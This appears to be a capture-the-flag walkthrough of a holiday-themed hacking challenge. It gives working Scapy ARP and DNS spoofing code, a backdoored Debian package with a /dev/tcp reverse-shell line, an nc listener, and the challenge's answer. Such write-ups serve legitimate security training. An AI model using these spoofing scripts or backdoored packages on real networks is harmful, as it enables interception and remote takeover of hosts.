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ARP Shenanigans#


Go to the NetWars room on the roof and help Alabaster Snowball get access back to a host using ARP. Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?

Difficulty: 4/5

Alabaster Snowball's dialog:#

Those skills might be useful to you later on!
I've been trying those skills out myself on this other terminal.
I'm pretty sure I can use tcpdump to sniff some packets.
Then I'm going to try a machine-in-the-middle attack.
Next, I'll spoof a DNS response to point the host to my terminal.
Then I want to respond to its HTTP request with something I'll cook up.
I'm almost there, but I can't quite get it. I could use some help!

Oh, I see the Scapy Present Packet Prepper has already been completed!
Now you can help me get access to this machine.
It seems that some interloper here at the North Pole has taken control of the host.
We need to regain access to some important documents associated with Kringle Castle.
Maybe we should try a machine-in-the-middle attack?
That could give us access to manipulate DNS responses.
But we'll still need to cook up something to change the HTTP response.
I'm sure glad you're here Santa.


Jack Frost must have gotten malware on our host at because we can no longer access it. Try sniffing the eth0 interface using tcpdump -nni eth0 to see if you can view any traffic from that host.
The host is performing an ARP request. Perhaps we could do a spoof to perform a machine-in-the-middle attack. I think we have some sample scapy traffic scripts that could help you in /home/guest/scripts.
Hmmm, looks like the host does a DNS request after you successfully do an ARP spoof. Let's return a DNS response resolving the request to our IP.
The malware on the host does an HTTP request for a .deb package. Maybe we can get command line access by sending it a command in a customized .deb file



Complete the terminal Scapy Prepper for hints on how to solve this objective.

From the hints, we find out a host on the Castle's network has been compromised. We also learn that there will be a multi-step process to gain access to the host:

  • Respond to the ARP request from the compromised host.
  • Respond to the DNS request from the compromised host.
  • Provide a package file to the compromised host with a backdoor script.
  • Gain shell access to the host and retrieve the document.

ARP response#

The compromised host is requesting the MAC address of We have a template scapy script in scripts/, but some of the fields in the response need to be filled out:

ether_resp = Ether(dst="SOMEMACHERE", type=0x806, src="SOMEMACHERE")

arp_response = ARP(pdst="SOMEMACHERE")
arp_response.op = 99999
arp_response.plen = 99999
arp_response.hwlen = 99999
arp_response.ptype = 99999
arp_response.hwtype = 99999

arp_response.hwsrc = "SOMEVALUEHERE"
arp_response.psrc = "SOMEVALUEHERE"
arp_response.hwdst = "SOMEVALUEHERE"
arp_response.pdst = "SOMEVALUEHERE"

We need to respond to the ARP request and tell the compromised host to direct any subsequent traffic to us. Using this guide to ARP packets, we can fill in the appropriate sections in the response packets:

ether_resp = Ether(dst=packet[Ether].src, type=0x806, src=macaddr)

arp_response = ARP(pdst=packet[ARP].psrc)
arp_response.op = "is-at"
arp_response.plen = packet[ARP].plen
arp_response.hwlen = packet[ARP].hwlen
arp_response.ptype = packet[ARP].ptype
arp_response.hwtype = packet[ARP].hwtype

arp_response.hwsrc = macaddr
arp_response.psrc = packet[ARP].pdst
arp_response.hwdst = packet[Ether].src
arp_response.pdst = packet[ARP].psrc

And we were successful:

Successful ARP response

We can see the next piece of data we need to spoof: a DNS lookup for There's a sample script in scripts/, with some sections we need to change:

# destination ip we arp spoofed
ipaddr_we_arp_spoofed = ""

def handle_dns_request(packet):
    # Need to change mac addresses, Ip Addresses, and ports below.
    # We also need
    eth = Ether(src="00:00:00:00:00:00", dst="00:00:00:00:00:00")   # need to replace mac addresses
    ip  = IP(dst="", src="")                          # need to replace IP addresses
    udp = UDP(dport=99999, sport=99999)                             # need to replace ports
    dns = DNS(

DNS packets are complex to create, and can be tricky to get right. A couple of helpful guides are at here and here. With much trial and error, we can build a response packet with the following code:

# destination ip we arp spoofed
ipaddr_we_arp_spoofed = ""

def handle_dns_request(packet):
    # Need to change mac addresses, Ip Addresses, and ports below.
    # We also need
    eth = Ether(src=packet[Ether].dst, dst=packet[Ether].src)
    ip  = IP(dst=packet[IP].src, src=packet[IP].dst)
    udp = UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)
    dns = DNS(
            qr=1, ra=1, rd=1, opcode="QUERY", rcode="ok", qdcount=1, ancount=1, qd=packet[DNS].qd,
            an=DNSRR(rrname=packet[DNS].qd.qname, type='A', rclass='IN', ttl=82159, rdata=ipaddr),

A small shell script helps manage starting the spoof scripts. The DNS spoof script is started first, to be ready when the ARP spoof fires:


python3 &
python3 &

We can see the ARP request & response, then the DNS query and response:

ARP & DNS responses

Now we see a new request from the compromised host: an attempted HTTP request, which failed as there was no web server listening on port 80:

HTTP request

We can start one with python3 -m http.server 80, run our shell script again, and look at the web server output to see what the compromised host is requesting:

HTTP log

The compromised host is requesting a Debian package /pub/jfrost/backdoor/suriv_amd64.deb. We can create a package with a backdoor in it, serve it up with the correct path, and receive a remote shell when the compromised host installs the package. There are a number of Debian packages in the debs directory in the terminal, but I found it easier to use a tool to create an empty package with just a reverse shell backdoor instead of modifying one of the provided ones. The tool I used is Derbie. After cloning the GitHub repository on your local machine and installing the dependencies, create a smiple reverse shell payload script:


0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196

Replace with the IP address of the host in your terminal.

Next, generate the package with python3 suriv

Malicious package

We now need to get the package from our local machine into the ARP Spoof terminal. As the terminal can't reach outside it's network, the best method of transferring the package is copy/paste. On the local machine run base64 debs/suriv_43_all.deb, copy the base64-encoded text, and in the terminal run base64 -d > suriv_amd64.deb, then paste the text.

For the HTTP GET request to work, we need to make sure we have the correct path set up. Run mkdir -p pub/jfrost/backdoor/, move the package file to that directory, then re-start the Python HTTP server. Finally, add a listener to the shell script:


python3 &
python3 &
nc -vnlp 10444

Run the script, and wait for the reverse shell from the compromised host. Once we see the connect to ... message from nc, we know the reverse shell was successful:

Successful reverse shell

We can use the same copy/paste method to transfer the /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt file out of the terminal and to our local machine:

Grab the file

And do the reverse on our local machine: base64 -d | gunzip > NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Reading the relatively mundane meeting minutes from the North Pole Land Use board, we see that Tanta Kringle recused herself from voting on the Kringle Castle expansion plans.


Tanta Kringle